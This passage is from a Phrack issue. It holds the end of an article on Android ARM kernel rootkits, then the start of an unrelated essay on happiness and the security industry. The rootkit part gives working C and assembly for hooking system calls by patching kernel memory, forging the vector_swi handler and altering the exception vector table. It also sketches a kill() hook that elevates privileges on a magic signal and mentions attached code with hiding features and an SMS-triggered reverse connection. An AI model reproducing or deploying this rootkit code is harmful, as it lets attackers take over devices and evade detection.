addr_ptr=(char *)get_kernel_symbol("hacked_writev");
|
|
write_kmem((char *)&addr_ptr,addr+__NR_WRITEV*4,4);
|
|
addr_ptr=(char *)get_kernel_symbol("hacked_kill");
|
|
write_kmem((char *)&addr_ptr,addr+__NR_KILL*4,4);
|
|
addr_ptr=(char *)get_kernel_symbol("hacked_getdents64");
|
|
write_kmem((char *)&addr_ptr,addr+__NR_GETDENTS64*4,4);
|
|
} else if(c=='U'||c=='u'){ /* uninstall */
|
|
...
|
|
}
|
|
close(kmem);
|
|
|
|
The attack code can be compiled either as an LKM module or as a regular
ELF32 executable.
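
The replacement handlers referenced above (hacked_getuid and friends) are
ordinary functions exported by the kernel module. As a minimal sketch, not
the attached code, a hooked kill() that keeps a pointer to the original
routine and reserves one magic signal number could look like this:

asmlinkage long (*orig_kill)(int pid,int sig);

asmlinkage long hacked_kill(int pid,int sig)
{
        if(sig==31){
                /* magic signal: e.g. elevate the calling task by
                   patching its cred structure using the offsets
                   found in section 2.3 */
                return 0;
        }
        return orig_kill(pid,sig);      /* pass everything else through */
}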
|
|
|
|
|
|
--[ 4 - modifying sys_call_table handle code in vector_swi handler routine
|
|
|
|
The techniques introduced in section 3 are easily detected by rootkit
detection tools. So, some pioneers have researched ways to modify parts of
the exception handler function that processes the software interrupt. The
technique introduced in this section generates a copy of sys_call_table in
kernel heap memory without modifying sys_call_table directly.
|
|
|
|
static void *hacked_sys_call_table[500];
|
|
static void **sys_call_table;
|
|
int sys_call_table_size;
|
|
...
|
|
|
|
int init_module(void){
|
|
...
|
|
get_sys_call_table(); // position and size of sys_call_table
|
|
memcpy(hacked_sys_call_table,sys_call_table,sys_call_table_size*4);
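
The hooks themselves are then installed into the copy only, so the real
table is never touched; a minimal sketch, assuming an EABI kernel where the
__NR_* constants can be used directly as table indices and hacked_getuid /
hacked_getdents64 are the module's replacement handlers:

/* patch entries in the private copy only */
hacked_sys_call_table[__NR_getuid]=(void *)hacked_getuid;
hacked_sys_call_table[__NR_getdents64]=(void *)hacked_getdents64;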
|
|
|
|
After generating this copy, we have to modify the part of the vector_swi
handler routine that references sys_call_table. This is because
sys_call_table is handled as an offset, not as an absolute address, which
is a feature that separates the ARM architecture from the ia32
architecture.
|
|
|
|
code before compile:
|
|
ENTRY(vector_swi)
|
|
...
|
|
get_thread_info tsk
|
|
adr tbl, sys_call_table ; load syscall table pointer
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~ -> code of sys_call_table
|
|
ldr ip, [tsk, #TI_FLAGS] ; @ check for syscall tracing
|
|
|
|
code after compile:
|
|
000000c0 <vector_swi>:
|
|
...
|
|
100: e1a096ad mov r9, sp, lsr #13 ; get_thread_info tsk
|
|
104: e1a09689 mov r9, r9, lsl #13
|
|
[*]108: e28f8094 add r8, pc, #148 ; load syscall table pointer
|
|
~~~~~~~~~~~~~~~~~~~~
|
|
+-> deal sys_call_table as relative offset
|
|
10c: e599c000 ldr ip, [r9] ; check for syscall tracing
|
|
|
|
So, I contrived a hooking technique modifying "add r8, pc, #offset" code
|
|
itself like this.
|
|
|
|
before modifying: e28f80?? add r8, pc, #??
|
|
after modifying: e59f80?? ldr r8, [pc, #??]
|
|
|
|
The modified instruction loads the word stored at the specified offset
from the current pc into the r8 register; as a result, r8 ends up holding
the address of the sys_call_table copy. Now, we need a spare location near
the handler code in which to store the address of that copy. After some
consideration, I decided to overwrite the nop padding in another function's
epilogue near the vector_swi handler.
|
|
|
|
00000174 <__sys_trace_return>:
|
|
174: e5ad0008 str r0, [sp, #8]!
|
|
178: e1a02007 mov r2, r7
|
|
17c: e1a0100d mov r1, sp
|
|
180: e3a00001 mov r0, #1 ; 0x1
|
|
184: ebfffffe bl 0 <syscall_trace>
|
|
188: eaffffb1 b 54 <ret_to_user>
|
|
[*]18c: e320f000 nop {0}
|
|
~~~~~~~~ -> position to overwrite the copy of sys_call_table
|
|
190: e320f000 nop {0}
|
|
...
|
|
|
|
000001a0 <__cr_alignment>:
|
|
1a0: 00000000 ....
|
|
|
|
000001a4 <sys_call_table>:
|
|
|
|
Now, if we compute the pc-relative offset from the patched instruction to
the location overwritten with the address of the sys_call_table copy and
modify the code accordingly, the copied table is used whenever a system
call is made. The hooking code that modifies part of the vector_swi
handling routine and the nop code near sys_call_table is as follows:
|
|
|
|
void install_hooker(){
|
|
void *swi_addr=(long *)0xffff0008;
|
|
unsigned long offset=0;
|
|
unsigned long *vector_swi_addr=0,*ptr;
|
|
unsigned char buf[MAP_SIZE+1];
|
|
unsigned long modify_addr1=0;
|
|
unsigned long modify_addr2=0;
|
|
unsigned long addr=0;
|
|
char *addr_ptr;
|
|
|
|
offset=((*(long *)swi_addr)&0xfff)+8;
|
|
vector_swi_addr=*(unsigned long *)(swi_addr+offset);
|
|
|
|
memset((char *)buf,0,sizeof(buf));
|
|
read_kmem(buf,(long)vector_swi_addr,MAP_SIZE);
|
|
ptr=(unsigned long *)buf;
|
|
|
|
/* get the address of ldr that handles sys_call_table */
|
|
while(ptr){
|
|
if(((*(unsigned long *)ptr)&0xfffff000)==0xe28f8000){
|
|
modify_addr1=(unsigned long)vector_swi_addr;
|
|
break;
|
|
}
|
|
ptr++;
|
|
vector_swi_addr++;
|
|
}
|
|
/* get the address of nop that will be overwritten */
|
|
while(ptr){
|
|
if(*(unsigned long *)ptr==0xe320f000){
|
|
modify_addr2=(unsigned long)vector_swi_addr;
|
|
break;
|
|
}
|
|
ptr++;
|
|
vector_swi_addr++;
|
|
}
|
|
|
|
/* overwrite nop with hacked_sys_call_table */
|
|
addr_ptr=(char *)get_kernel_symbol("hacked_sys_call_table");
|
|
write_kmem((char *)&addr_ptr,modify_addr2,4);
|
|
|
|
/* calculate fake table offset */
|
|
offset=modify_addr2-modify_addr1-8;
|
|
|
|
/* change sys_call_table offset into fake table offset */
|
|
addr=0xe59f8000+offset; /* ldr r8, [pc, #offset] */
|
|
addr_ptr=(char *)addr;
|
|
write_kmem((char *)&addr_ptr,modify_addr1,4);
|
|
|
|
return;
|
|
}
|
|
|
|
This code finds the instruction that references sys_call_table within the
vector_swi handler routine, then locates nearby nop code and stores there
the address of hacked_sys_call_table, the copy of sys_call_table. After
that, it rewrites the sys_call_table instruction so that it loads from the
offset at which hacked_sys_call_table now resides, and hooking starts.
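
Restoring the original behaviour is symmetric; a minimal sketch, assuming
the original 4 byte instruction at modify_addr1 was saved before patching
(this helper is not part of the attached code):

void uninstall_hooker(unsigned long modify_addr1,unsigned long saved_insn)
{
        char *addr_ptr=(char *)saved_insn;

        /* put the original "add r8, pc, #offset" instruction back;
           the overwritten nop could be restored the same way */
        write_kmem((char *)&addr_ptr,modify_addr1,4);
}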
|
|
|
|
|
|
--[ 5 - exception vector table modifying hooking techniques
|
|
|
|
This section discusses two hooking techniques: one changes the address of
the software interrupt exception handler routine within the exception
vector table, and the other changes the offset of the code branching to the
vector_swi handler. The purpose of both is to implement hooking that
modifies only the exception vector table, without touching sys_call_table
or the vector_swi handler.
|
|
|
|
|
|
--[ 5.1 - exception vector table
|
|
|
|
The exception vector table contains the branch code array, the addresses
of the various exception handler routines, and the stub code that calls
those handlers. These are declared in entry-armv.S and copied up to the
high vector (0xffff0000) by the early_trap_init() routine in traps.c,
together forming the exception vector table.
|
|
|
|
traps.c:
|
|
void __init early_trap_init(void)
|
|
{
|
|
unsigned long vectors = CONFIG_VECTORS_BASE; /* 0xffff0000 */
|
|
extern char __stubs_start[], __stubs_end[];
|
|
extern char __vectors_start[], __vectors_end[];
|
|
extern char __kuser_helper_start[], __kuser_helper_end[];
|
|
int kuser_sz = __kuser_helper_end - __kuser_helper_start;
|
|
|
|
/*
|
|
* Copy the vectors, stubs and kuser helpers
|
|
(in entry-armv.S)
|
|
* into the vector page, mapped at 0xffff0000,
|
|
and ensure these
|
|
* are visible to the instruction stream.
|
|
*/
|
|
memcpy((void *)vectors, __vectors_start,
|
|
__vectors_end - __vectors_start);
|
|
memcpy((void *)vectors + 0x200, __stubs_start,
|
|
__stubs_end - __stubs_start);
|
|
|
|
After these pieces are copied in order by the early_trap_init() routine,
the exception vector table is initialized and looks as follows.
|
|
|
|
# ./coelacanth -e
|
|
[000] ffff0000: ef9f0000 [Reset] ; svc 0x9f0000 branch code array
|
|
[004] ffff0004: ea0000dd [Undef] ; b 0x380
|
|
[008] ffff0008: e59ff410 [SWI] ; ldr pc, [pc, #1040] ; 0x420
|
|
[00c] ffff000c: ea0000bb [Abort-perfetch] ; b 0x300
|
|
[010] ffff0010: ea00009a [Abort-data] ; b 0x280
|
|
[014] ffff0014: ea0000fa [Reserved] ; b 0x404
|
|
[018] ffff0018: ea000078 [IRQ] ; b 0x608
|
|
[01c] ffff001c: ea0000f7 [FIQ] ; b 0x400
|
|
[020] Reserved
|
|
... skip ...
|
|
[22c] ffff022c: c003dbc0 [__irq_usr] ; exception handler routine addr array
|
|
[230] ffff0230: c003d920 [__irq_invalid]
|
|
[234] ffff0234: c003d920 [__irq_invalid]
|
|
[238] ffff0238: c003d9c0 [__irq_svc]
|
|
[23c] ffff023c: c003d920 [__irq_invalid]
|
|
...
|
|
[420] ffff0420: c003df40 [vector_swi]
|
|
|
|
When a software interrupt occurs, the 4 byte instruction at 0xffff0008 is
executed. It loads into pc the exception handler address stored at a fixed
offset from the current pc; in other words, it branches to the vector_swi
handler routine whose address is stored at offset 0x420 of the exception
vector table.
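
This can be checked from a kernel module by decoding that instruction by
hand; a small illustrative sketch, assuming the high vector layout
described above:

void dump_swi_vector(void)
{
        unsigned long insn=*(unsigned long *)0xffff0008;
        /* "ldr pc, [pc, #imm]": effective address = 0xffff0008 + 8 + imm */
        unsigned long slot=0xffff0008+8+(insn&0xfff);

        printk("SWI slot %08lx -> vector_swi %08lx\n",
                slot,*(unsigned long *)slot);
}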
|
|
|
|
|
|
--[ 5.2 - Hooking techniques changing vector_swi handler
|
|
|
|
The first technique to be introduced changes the vector_swi handler: it
replaces, within the exception vector table, the address of the exception
handler routine that processes the software interrupt, so that a vector_swi
handler routine forged by the attacker is called instead.
|
|
|
|
    1. Generate a copy of sys_call_table in the kernel heap and replace
       routine addresses in it as described before.
    2. For simple hooking, copy to the kernel heap not the whole vector_swi
       handler routine but only the code that runs before sys_call_table is
       referenced.
    3. Fix up the copied, fake vector_swi handler so that it still behaves
       normally, and change its code so that it uses the address of the
       sys_call_table copy generated in step 1.
    4. Jump back into the original vector_swi handler routine, right after
       its sys_call_table handling code.
    5. Change the vector_swi handler address in the exception vector table
       to the address of the fake vector_swi handler code.
|
|
|
|
The completed fake vector_swi handler code looks like the following.
|
|
|
|
00000000 <new_vector_swi>:
|
|
00: e24dd048 sub sp, sp, #72 ; 0x48
|
|
04: e88d1fff stmia sp, {r0 - r12}
|
|
08: e28d803c add r8, sp, #60 ; 0x3c
|
|
0c: e9486000 stmdb r8, {sp, lr}^
|
|
10: e14f8000 mrs r8, SPSR
|
|
14: e58de03c str lr, [sp, #60]
|
|
18: e58d8040 str r8, [sp, #64]
|
|
1c: e58d0044 str r0, [sp, #68]
|
|
20: e3a0b000 mov fp, #0 ; 0x0
|
|
24: e3180020 tst r8, #32 ; 0x20
|
|
28: 12877609 addne r7, r7, #9437184
|
|
2c: 051e7004 ldreq r7, [lr, #-4]
|
|
[*]30: e59fc020 ldr ip, [pc, #32] ; 0x58 <__cr_alignment>
|
|
34: e59cc000 ldr ip, [ip]
|
|
38: ee01cf10 mcr 15, 0, ip, cr1, cr0, {0}
|
|
3c: f1080080 cpsie i
|
|
40: e1a096ad mov r9, sp, lsr #13
|
|
44: e1a09689 mov r9, r9, lsl #13
|
|
[*]48: e59f8000 ldr r8, [pc, #0]
|
|
[*]4c: e59ff000 ldr pc, [pc, #0]
|
|
[*]50: <hacked_sys_call_table address>
|
|
[*]54: <vector_swi address to jmp>
|
|
[*]58: <__cr_alignment routine address referring at 0x30>
|
|
|
|
The asterisked lines are the code modified or added relative to the
original. Besides the part changed so that the code still references the
__cr_alignment function correctly, I added instructions that load the
address of the sys_call_table copy into the r8 register and then jump back
into the original vector_swi handler function. The following is the attack
code written as a kernel module.
|
|
|
|
static unsigned char new_vector_swi[500];
|
|
...
|
|
|
|
void make_new_vector_swi(){
|
|
void *swi_addr=(long *)0xffff0008;
|
|
void *vector_swi_ptr=0;
|
|
unsigned long offset=0;
|
|
unsigned long *vector_swi_addr=0,orig_vector_swi_addr=0;
|
|
unsigned long add_r8_pc_addr=0;
|
|
unsigned long ldr_ip_pc_addr=0;
|
|
int i;
|
|
|
|
offset=((*(long *)swi_addr)&0xfff)+8;
|
|
vector_swi_addr=*(unsigned long *)(swi_addr+offset);
|
|
vector_swi_ptr=swi_addr+offset; /* 0xffff0420 */
|
|
orig_vector_swi_addr=vector_swi_addr; /* vector_swi's addr */
|
|
|
|
/* processing __cr_alignment */
|
|
while(vector_swi_addr++){
|
|
if(((*(unsigned long *)vector_swi_addr)&
|
|
0xfffff000)==0xe28f8000){
|
|
add_r8_pc_addr=(unsigned long)vector_swi_addr;
|
|
break;
|
|
}
|
|
/* get __cr_alingment's addr */
|
|
if(((*(unsigned long *)vector_swi_addr)&
|
|
0xfffff000)==0xe59fc000){
|
|
offset=((*(unsigned long *)vector_swi_addr)&
|
|
0xfff)+8;
|
|
ldr_ip_pc_addr=*(unsigned long *)
|
|
((char *)vector_swi_addr+offset);
|
|
}
|
|
}
|
|
/* creating fake vector_swi handler */
|
|
memcpy(new_vector_swi,(char *)orig_vector_swi_addr,
|
|
(add_r8_pc_addr-orig_vector_swi_addr));
|
|
offset=(add_r8_pc_addr-orig_vector_swi_addr);
|
|
for(i=0;i<offset;i+=4){
|
|
if(((*(long *)&new_vector_swi[i])&
|
|
0xfffff000)==0xe59fc000){
|
|
*(long *)&new_vector_swi[i]=0xe59fc020;
|
|
// ldr ip, [pc, #32]
|
|
break;
|
|
}
|
|
}
|
|
/* ldr r8, [pc, #0] */
|
|
*(long *)&new_vector_swi[offset]=0xe59f8000;
|
|
offset+=4;
|
|
/* ldr pc, [pc, #0] */
|
|
*(long *)&new_vector_swi[offset]=0xe59ff000;
|
|
offset+=4;
|
|
/* fake sys_call_table */
|
|
*(long *)&new_vector_swi[offset]=hacked_sys_call_table;
|
|
offset+=4;
|
|
/* jmp original vector_swi's addr */
|
|
*(long *)&new_vector_swi[offset]=(add_r8_pc_addr+4);
|
|
offset+=4;
|
|
/* __cr_alignment's addr */
|
|
*(long *)&new_vector_swi[offset]=ldr_ip_pc_addr;
|
|
offset+=4;
|
|
|
|
/* change the address of vector_swi handler
|
|
within exception vector table */
|
|
*(unsigned long *)vector_swi_ptr=&new_vector_swi;
|
|
|
|
return;
|
|
}
|
|
|
|
This code locates the address where the original vector_swi handler routine
starts processing sys_call_table, and then copies the original vector_swi
instructions up to that address into the fake vector_swi buffer. After
patching the copied code so that it still refers to the correct
__cr_alignment address, we append instructions that load the address of the
sys_call_table copy into the r8 register and jump back into the original
vector_swi handler routine. Finally, hooking starts as soon as we overwrite
the address of the vector_swi handler within the exception vector table.
|
|
|
|
|
|
--[ 5.3 - Hooking techniques changing branch instruction offset
|
|
|
|
The second hooking technique changes a branch instruction offset within the
exception vector table: instead of modifying the vector_swi handler itself,
we change the offset of the 4-byte branch instruction that is executed
automatically when a software interrupt occurs.
|
|
|
|
1. Proceed to step 4 like the way in section 5.1.
|
|
2. Store the address of generated fake vector_swi handler routine
|
|
in the specific area within exception vector table.
|
|
3. Change 1 byte which is an offset of 4 byte instruction codes at
|
|
0xffff0008 and store.
|
|
|
|
The code compared with section 5.2 is as follows.
|
|
|
|
- *(unsigned long *)vector_swi_ptr=&new_vector_swi;
|
|
...
|
|
+ *(unsigned long *)(vector_swi_ptr+4)=&new_vector_swi; /* 0xffff0424 */
|
|
...
|
|
+ *(unsigned long *)swi_addr+=4; /* 0xe59ff410 -> 0xe59ff414 */
|
|
|
|
The changed exception vector table after hooking is as follows.
|
|
|
|
# ./coelacanth -e
|
|
[000] ffff0000: ef9f0000 [Reset] ; svc 0x9f0000 branch code array
|
|
[004] ffff0004: ea0000dd [Undef] ; b 0x380
|
|
[008] ffff0008: e59ff414 [SWI] ; ldr pc, [pc, #1044] ; 0x424
|
|
[00c] ffff000c: ea0000bb [Abort-perfetch] ; b 0x300
|
|
[010] ffff0010: ea00009a [Abort-data] ; b 0x280
|
|
[014] ffff0014: ea0000fa [Reserved] ; b 0x404
|
|
[018] ffff0018: ea000078 [IRQ] ; b 0x608
|
|
[01c] ffff001c: ea0000f7 [FIQ] ; b 0x400
|
|
[020] Reserved
|
|
... skip ...
|
|
[420] ffff0420: c003df40 [vector_swi]
|
|
[424] ffff0424: bf0ceb5c [new_vector_swi] ; fake vector_swi handler code
|
|
|
|
Hooking starts once the address of the fake vector_swi handler code has
been stored at 0xffff0424 and the offset of the 4-byte instruction at
0xffff0008 (ldr pc, [pc, #offset]) has been changed so that it loads the
handler address from 0xffff0424 instead of 0xffff0420.
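
To see why adding 4 to the instruction word is enough, recall that on ARM
the pc reads as the address of the current instruction plus 8. The following
minimal sketch (plain Python, only to illustrate the arithmetic, not part of
the module) decodes the literal-pool target of the instruction at
0xffff0008:

    # Decode the target of an ARM "ldr pc, [pc, #imm]" word: the 12-bit
    # immediate is added to pc, and pc reads as the instruction address + 8.
    def ldr_pc_target(insn_addr, insn_word):
        return insn_addr + 8 + (insn_word & 0xfff)

    print(hex(ldr_pc_target(0xffff0008, 0xe59ff410)))  # 0xffff0420, before
    print(hex(ldr_pc_target(0xffff0008, 0xe59ff414)))  # 0xffff0424, hooked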
|
|
|
|
|
|
--[ 6 - Conclusion
|
|
|
|
Once more, I thank the many pioneers for their devotion and inspiration.
I also hope that more Android rootkit research will follow. It is a pity
that I couldn't cover all the ideas that came to my mind while writing
this paper. However, I also think that it is better to discuss the more
advanced and practical techniques next time -if you like this one ;-)-.
|
|
|
|
For more information, the attached example code provides not only file,
process and kernel module hiding features but also classical rootkit
features such as granting admin privileges to a specific gid user and
changing process privileges. I referred to the Defcon 18 whitepaper of
Christian Papathanasiou and Nicholas J. Percoco for performing the reverse
connection when an sms message is received from an appointed phone number.
|
|
|
|
Thanks to:
|
|
vangelis and GGUM for translating Korean into English. Other than those who
|
|
helped me on this paper, I'd like to thank my colleagues, people in my
|
|
graduate school and everyone who knows me.
|
|
|
|
|
|
--[ 7 - References
|
|
|
|
[1] "Abuse of the Linux Kernel for Fun and Profit" by halflife
|
|
[Phrack issue 50, article 05]
|
|
|
|
[2] "Weakening the Linux Kernel" by plaguez
|
|
[Phrack issue 52, article 18]
|
|
|
|
[3] "RUNTIME KERNEL KMEM PATCHING" by Silvio Cesare
|
|
[runtime-kernel-kmem-patching.txt]
|
|
|
|
[4] "Linux on-the-fly kernel patching without LKM" by sd & devik
|
|
[Phrack issue 58, article 07]
|
|
|
|
[5] "Handling Interrupt Descriptor Table for fun and profit" by kad
|
|
[Phrack issue 59, article 04]
|
|
|
|
[6] "trojan eraser or i want my system call table clean" by riq
|
|
[Phrack issue 54, article 03]
|
|
|
|
[7] "yet another article about stealth modules in linux" by riq
|
|
["abtrom: anti btrom" in a mail to Bugtraq]
|
|
|
|
[8] "Saint Jude, The Model" by Timothy Lawless
|
|
[http://prdownloads.sourceforge.net/stjude/StJudeModel.pdf]
|
|
|
|
[9] "IA32 ADVANCED FUNCTION HOOKING" by mayhem
|
|
[Phrack issue 58, article 08]
|
|
|
|
[10] "Android LKM Rootkit" by fred
|
|
[http://upche.org/doku.php?id=wiki:rootkit]
|
|
|
|
[11] "This is not the droid you're looking for..." by Trustwave
|
|
[DEFCON-18-Trustwave-Spiderlabs-Android-Rootkit-WP.pdf]
|
|
|
|
|
|
--[ 8 - Appendix: earthworm.tgz.uu
|
|
|
|
I attach demo code to demonstrate the concepts explained in this paper.
This code can be used as real attack code or just as a proof-of-concept.
I hope you will use it only for study, not for malicious purposes.
|
|
|
|
|
|
--[ EOF
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume 0x0e, Issue 0x44, Phile #0x07 of 0x13
|
|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=-------------------------=[ Happy Hacking ]=---------------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=--------------------------=[ by Anonymous ]=---------------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|
|
-------
|
|
|
|
1. Introduction
|
|
|
|
2. The Happiness Hypothesis
|
|
|
|
3. The consulting industry
|
|
|
|
4. Rebirth
|
|
|
|
5. Conclusions
|
|
|
|
6. References
|
|
|
|
-------
|
|
|
|
--[ 1 - Introduction
|
|
|
|
I've been fascinated with happiness since my college days. Prior to 1998
|
|
psychology focused on fixing people who had problems in an attempt to make
|
|
them more "normal". However, recent trends in psychology have brought a
|
|
whole new field called positive psychology. Positive psychology, or the
|
|
science of Happiness, brings a wealth of research on how normal people can
|
|
achieve greater levels of happiness. As you delve into the subject you will
|
|
discover that most of the conclusions associated with the research into the
|
|
topic of happiness actually run counter to the popular culture
|
|
understanding of what brings happiness.
|
|
|
|
In this article I'd like to expose some ideas that directly impact the
|
|
hacking scene and specifically as it relates to working in the security
|
|
industry. I'd also like to introduce the idea of hacking happiness.
|
|
|
|
If you could spend a percentage of your time learning about happiness, how
|
|
much happier do you think you could be? Hacking happiness means cutting the
|
|
path to happiness straight to what makes you happy by researching happiness
|
|
just like you would any security topic.
|
|
|
|
Since the article is focused on Happiness as it relates to hacking, there
|
|
are many subjects of positive psychology that we are not going to touch or
|
|
mention. However, if you are interested in reading more about the field,
|
|
Wikipedia has an excellent article on the subject:
|
|
|
|
- http://en.wikipedia.org/wiki/Positive_psychology
|
|
|
|
|
|
--[ 2 - The Happiness Hypothesis
|
|
|
|
Most of the ideas introduced by this article are borrowed from "The
|
|
Happiness Hypothesis" by Jonathan Haidt, which I recommend if you'd like to
|
|
dig deeper into the subject.
|
|
|
|
The first thing that you should know about happiness, and that research has
proved, is:
|
|
|
|
- "People are very bad at predicting what will bring them happiness." -
|
|
|
|
To expose this idea let me provide an example. Researchers took a look at 2
|
|
different groups of people that had been through completely opposite
|
|
situations, the first group are lottery winners, and the second group are
|
|
people that became paraplegics through some type of accident. Both groups
|
|
were interviewed at 2 different times, once just after the event (winning
|
|
the lottery or becoming paraplegic), and once more again several years
|
|
later. The results of their interviews are quite astonishing.
|
|
|
|
The first group, the lottery winners, as you might expect, had very high
|
|
happiness levels when interviewed shortly after they had won the lottery.
|
|
The second group, those who were newly paralyzed had a very low level of
|
|
happiness, some were even so unhappy that they regretted not dying during
|
|
the accident. These findings are quite obvious and shouldn't be surprising
|
|
to you; however what is astonishing are the results of the second
|
|
interview.
|
|
|
|
Years later, the lottery winners were interviewed again, this time the
|
|
results were quite surprising. As it turns out, their happiness level had
|
|
dropped significantly to levels so low that most of the winners were more
|
|
unhappy now than before winning the lottery. In contrast, the happiness of
|
|
the group of paraplegics was very high, equal to or higher than before the
|
|
accident. So what really happened?
|
|
|
|
To explain this, let me describe the circumstances of the lottery winners.
|
|
Having won the lottery, they thought they had achieved everything they
|
|
wanted, since popular culture equates happiness with material wealth, and
|
|
so their short term happiness level grew quite high. After some time
|
|
though, they started to realize that the money wasn't bringing them the
|
|
happiness they had once expected to find in wealth.
|
|
Frustrated at the possibility that they would never be able to achieve full
|
|
happiness, their happiness level started dropping. To try to compensate for
|
|
their decreasing happiness level, they started spending money on material
|
|
things, but that was no longer a happiness source. Further exacerbating the
|
|
problem, this new wealth brought new problems (to quote Notorious B.I.G. -
|
|
"Mo money mo problems"). Now family, friends and colleagues were regarded
|
|
as a threat, thinking that all they wanted is to take advantage of their
|
|
new wealth. People around them started asking for loans and favors, which
|
|
led them to distance themselves from their families and friends. Again, in
|
|
order to compensate, they started trying to make new friends that had their
|
|
own wealth status. But breaking the bonds with old friends and family that
|
|
had been established for most of their lives and trying to establish new
|
|
ones, brought a feeling of loneliness that directly correlates to their
|
|
happiness levels significantly dropping.
|
|
|
|
On the other hand those who had become paraplegics relied heavily on their
|
|
families and friends to help them through the rough times, thus
|
|
strengthening the bonds between them. And just like the lottery winners,
|
|
the new circumstances brought back old friends from the past. But unlike
|
|
with lottery winners whose friends came back looking to take advantage of
|
|
their new wealth, these old friends came back for the opposite; they sought
|
|
to help. Another factor associated with the increased happiness was the
|
|
fact that the group that was paralyzed had to learn to cope with being
|
|
paraplegics. Learning to cope with being paraplegics brought an immense
|
|
sense of achievement that made their happiness levels go up. After a few
|
|
years their family relations were stronger than ever; friends were closer
|
|
and their sense of achievement from having overcome their limitations had
|
|
brought them an immense amount of happiness that, when compared to their
|
|
happiness levels before the accident, was equal and most of the times
|
|
higher.
|
|
|
|
If someone were to ask you whether you would choose to become paraplegic or
|
|
win the lottery, it is obvious that everyone would choose to win the
|
|
lottery; however this choice goes against research which has shown that by
|
|
becoming a paraplegic you would ultimately be happier.
|
|
|
|
Obviously I am not saying this is the path you need to choose (if you are
|
|
thinking of doing this, please stop!). I am merely trying to demonstrate
|
|
that the actual road to happiness may force you to look at things in a very
|
|
different and counter intuitive manner.
|
|
|
|
|
|
--[ 3 - The Security Industry
|
|
|
|
In recent years I've seen how many hackers join the information security
|
|
industry, many of them with the illusion that hacking as their day job
|
|
will bring them a great deal of happiness. After a couple of years they
|
|
discover they no longer enjoy hacking, that those feelings they used to
|
|
have in the old days are no longer there, and they decide to blame the
|
|
hacking scene, often condemning it as "being dead".
|
|
|
|
I'll try to explain this behavior from the science of happiness point of
|
|
view.
|
|
|
|
Let me start by looking at Journalism. The science of happiness has shown
|
|
that people are happy in a profession where:
|
|
|
|
- "Doing good (high quality work) matches with doing well (achieving
|
|
wealth and professional advancement) in the field." -
|
|
|
|
Journalism is one of those careers where doing good (making the world
|
|
better by promoting democracy and free press) doesn't usually lead to
|
|
rising as a journalist. Julian Assange, the chief editor of Wikileaks, is
|
|
a pretty obvious example of this. By firmly believing in free press he has
|
|
brought upon himself a great deal of trouble. In contrast, being
|
|
manipulative and exaggerating news often leads to selling more news, which
|
|
in turn allows for the sales of more ads, which correlates to doing well.
|
|
But by doing so, journalists have to compromise their beliefs, which
|
|
ultimately makes their happiness levels go down. Those who decide not to
|
|
compromise feel angry at their profession when they see those who cheat and
|
|
compromise rise high. This feeling also causes their happiness levels to
|
|
drop. Journalism is therefore one of those professions where its
|
|
practitioners tend to be the most unhappy.
|
|
|
|
Hacking on the other hand doesn't suffer from this issue. In the hacking
|
|
scene doing great work is often recognized and admired. Those hackers that
|
|
are able to write that exploit thought to be impossible, or find that
|
|
unbelievably complex vulnerability, are recognized and praised by the
|
|
community. Also, many hackers tend to develop great tools which are often
|
|
released as open source. The open source community shares a lot of
|
|
properties with the hacking community. It is not hard to see why people
|
|
enjoy developing open source projects so much. Most open source projects
|
|
are community organizations led by meritocracy, where the best programmers
|
|
can quickly escalate the ranks by writing great code. Furthermore, the idea
|
|
of making the code and the underlying designs widely available gives
|
|
participants a feeling of fulfillment as they are not doing this for profit
|
|
but to contribute to a better world. These ideals have also been an
|
|
integral part of the hacking community where one of its mottos is,
|
|
"Knowledge should be free, information should be free". Being part of such
|
|
communities brings a wealth of happiness, and is the reason why these
|
|
communities flourished without the need for any economic incentives.
|
|
|
|
Recent years however have brought the security industry closer to the
|
|
hacking industry. Many hacking scene members have become security industry
|
|
members once their responsibilities demanded more money (e.g. married with
|
|
kids and a mortgage). For them it seemed like the right fit and the perfect
|
|
job was to hack for a living.
|
|
|
|
However, the security industry does not have the same properties as the
|
|
hacking or open source communities. The security industry is much more like
|
|
the journalism industry.
|
|
|
|
The main difference between the hacking community and the security industry
|
|
is about the consumers of the security industry. While in the hacking
|
|
community the consumers are hackers themselves, in the security industry
|
|
the consumers are companies and other entities that don't have the same
|
|
behavior as hackers. The behavior of the security industry consumers is
|
|
similar to the behavior of the consumers of journalism. This is because
|
|
these companies are partially a subset of the consumers of journalism.
|
|
These consumers do not judge work as hackers do; instead they are more
|
|
ignorant and have a different set of criteria to judge work quality.
|
|
|
|
It is because of this, that once a hacker joins the security industry they
|
|
eventually discover that doing great work no longer means becoming a better
|
|
security professional. They quickly start discovering a whole new set of
|
|
rules to achieve what is considered to be the 'optimal', such as getting
|
|
various industry certifications (CISSP, etc), over-hyping their research
|
|
and its impact to generate press coverage, and often having to compromise
|
|
their ideals in order to protect their source of income (for example the
|
|
"no more free bugs", "no more free techniques" movements).
|
|
|
|
Those deciding that they don't want to be a part of this quickly realize
|
|
that the ones who do are the ones that rise up. Most of them try to fix the
|
|
situation by calling these people out, which usually gets the person being
called out criticized by the hacking community. But that is often
not the case within the security industry, where they still enjoy a great
deal of success.
|
|
|
|
To illustrate further, it has become very prevalent to announce discoveries
|
|
and claim that by making the vulnerability details public catastrophic
|
|
consequences would ensue, as we'll see in the example below. Most of the
|
|
hacking community are quick to criticize this behavior, often ostracizing
|
|
the person making the claim, and in a few cases hacking them in an
|
|
attempt to publicly expose them. However, this practice only has an impact
|
|
within the hacking community. In the security industry an opposite effect
|
|
happens and the person in question achieves a higher status that allows
|
|
him to present in the top security industry conferences. This person is
|
|
also praised for choosing to responsibly disclose the vulnerability thus
|
|
obtaining an overall security status of guru.
|
|
|
|
To illustrate this let's look at a real world example. On July 28, 2009,
|
|
during the Las Vegas based Black Hat Briefings industry conference, the
|
|
ZF05 ezine was released. The ezine featured a number of well respected
|
|
security researchers and how they were hacked. But one of these researchers
|
|
stood out, namely Dan Kaminsky. The reason why he stood out was that one
|
|
year before, a couple of months before Black Hat Briefings, Dan Kaminsky
|
|
decided to announce that he had found a critical bug in how DNS servers
|
|
operated [0].
|
|
|
|
Moreover he announced that he had decided, for the benefit of Internet
|
|
security, to release the technical details only during his Black Hat
|
|
Briefings speech that year. The response to this decision was very
|
|
polarized. On one side there was the "vendor" and information security
|
|
industry that praised Dan for following responsible disclosure. On the
|
|
